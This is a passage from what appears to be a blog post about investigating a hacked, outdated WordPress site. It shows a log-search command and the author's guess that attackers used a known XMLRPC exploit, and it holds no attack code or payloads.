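# On the post's box: first_hit 'traninfo[.]html' < /var/log/apache2/vhosts_access.log
```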

Something else I just realized, there is no wp-xml.php in the root folder.

It’s getting late and frankly, knowing that the site was running such an outdated version of Wordpress is sucking all the fun out of this research. A quick Google search tends to confirm the hackers used a known XMLRPC exploit to do their business. Another good option would have been Timthumb, or if you prefer, one of the worst pieces of code ever produced by a human being. Unfortunately (or fortunately, for what it’s worth), no such plugin was installed on this site.

So that’s about it for tonight. The site is not going back online and the content will be scrapped shortly.